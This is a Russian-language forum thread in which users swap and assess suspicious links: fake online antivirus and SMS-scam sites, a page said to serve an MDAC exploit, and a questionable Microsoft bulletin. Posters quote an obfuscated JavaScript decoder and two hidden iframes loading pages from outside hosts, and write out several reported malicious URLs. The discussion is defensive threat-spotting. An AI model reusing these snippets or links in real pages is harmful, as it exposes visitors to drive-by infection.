Взгляните на сайт :)

Пришло в асю:

[I]Посмотри что у тебя с системой, постоянно от тебя получаю вирусы. на вот просканируй компьютер, все лечит быстро _http://inet-guards.com/ и там же можно сделать, чтоб аккаунт не могли взломать[/I]

Ссылка перекидывает на _http://power-pc.ru/?k=371

Особенно порадовало _http://power-pc.ru/rules.htm - очень интересный антивирус :)))

Пара вопросов: как оперативно добавлять такие сайты в список опасных лаборатории касперского (пробовал через запрос в личном кабинете, но это очень медленно и муторно)? Как удобнее всего брать образцы заразы с этого сайта, ставить виртуальную машину?

[QUOTE=Jack2;560775]Пара вопросов: как оперативно добавлять такие сайты в список опасных лаборатории касперского (пробовал через запрос в личном кабинете, но это очень медленно и муторно)? Как удобнее всего брать образцы заразы с этого сайта, ставить виртуальную машину?[/QUOTE]
Ну мы можем, например, добавить уже во все импортные антивирусные компании так, но это лишком муторно... мне тяжело на импортном общаться :)
скрипт там какой то выполняется
[CODE]<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script> [/CODE]

Посмотрел сайтик, он вроде ничего не устанавливает, просто пишет, что вирусы найдены на вашем компе - отправьте смс, мол, он вирусы удалит. Закрыл браузер - и все. В систему вроде ничего не пыталось пролезть...

[size="1"][color="#666686"][B][I]Добавлено через 9 минут[/I][/B][/color][/size]

Жаль, нет единого инструмента для добавления опасных сайтов.

Ага, у меня тоже по аси от нескольких (двух) знакомых пришло насчёт инет-гуардс, до этого они гуляли по украинским сайтам и часто срабатывал антивирус, но похоже что-то пропустил и зловред увёл пароль.

Пришло письмо от [email][email protected][/email]

Содержание письма:

h t t p ://trelaks.ru

v9bt54

Проверьте, что же это такое?
Очередное порно? Вымогатель? Троян? Вирус?

[QUOTE=Bacardi;562949]Пришло письмо[/QUOTE]
Развод на смс + фальшивые антивирусы или что нибудь ещё

хм, а это что за сайт -_-

_http://popugais.cn//index.php?

[QUOTE]_http://popugais.cn//0.icq инфицирован множественные проникновения :O[/QUOTE]

[QUOTE=Юльча;565394]хм, а это что за сайт -_-

_http://popugais.cn//index.php?[/QUOTE]

эксплоит там mdac
сэмпл, который раздается
[url]http://www.virustotal.com/ru/analisis/df4323f6af3c2af1f1941d89db09f810f0e56333584c228b037c7c4b1a30f9ec-1263983435[/url]

[B]Юльча[/B], зайдя на сайт вы будете одним из ботнетов))

[B]Lexxus[/B], вот так прям сразу? :)
я как раз после посещения этого сайта писала свой пост, но признаков заражения до сих пор не вижу :)

[B]Юльча[/B], Нет конечно :)
Но атака направлена на сайт президента (не нашего) :)

Это скорее не атака, а "защита" от исследований/повторных заражений.
Эксплоит отдается один раз, а повторные попытки редиректят на какой либо легальный сайт. В данном случае - на сайт "президента (не нашего)"

С поломанного (уж более ГОДА) акакунта ICQ - получил очередную ссылку на "классную вещь" - ясень пень, гадость там какая то должна быть...кому интересно смотрите ____http://icbleu.com/video/00700/
Судя по всему явно вирус там не заложен, во всяком случае ресурс [url]http://www.burbon.ru/sites/virus.php[/url] ничего там не нашел.....

[QUOTE=wowka;569158]ничего там не нашел.....[/QUOTE]
[QUOTE]<iframe src="http://itmasterz.org/stats/ru1.php" style="display:none"></iframe>

<iframe src="http://talmeris.com/123/index.php" style="display:none"></iframe>[/QUOTE]:)

_defend-pc.ru
Опять онлайн псевдоантивирусы...

[B]bolshoy kot[/B], чОрт

У меня на диске [B]C[/B] вирусы :L :

[url=http://itmages.ru/image/view/19446/bcb1ff][img]http://itmages.ru/src/preview/19446/bcb1ff.png[/img][/url]

Рассылка MS:
[QUOTE]Здравствуйте!

В середине декабря 2009 года был совершен ряд атак, направленных в сторону нескольких крупных компаний. Для проведения атаки использовался набор различных системных уязвимостей, в том числе ранее неизвестная уязвимость Internet Explorer. Несколько дней назад это происшествие получило широкую огласку в СМИ под названием Aurora.

Сегодня было выпущено внеочередное обновление безопасности, полностью закрывающее обнаруженную уязвимость. Скачать его можно по ссылке: [/QUOTE]
Почти все ссылки ведут не на сайты MS, а куда-то ещё, например: _http://co1piltwb.partners.extranet.microsoft.com/mcoeredir/mcoeredirect.aspx?linkId=13124315&s1=e51459e4-1065-3f5e-47ca-de174374a77e

So sorry! [U]Легальная[/U] подписка, мин нет. :blush::this:

Однако в примере домен верхнего уровня - мелкософтовский. Чей-то DNS ломанули попутно?

Меня редиректит на [url]http://technet.microsoft.com/ru-ru/ie/dd353201.aspx[/url]

wm-max.com говорит что поломали сервер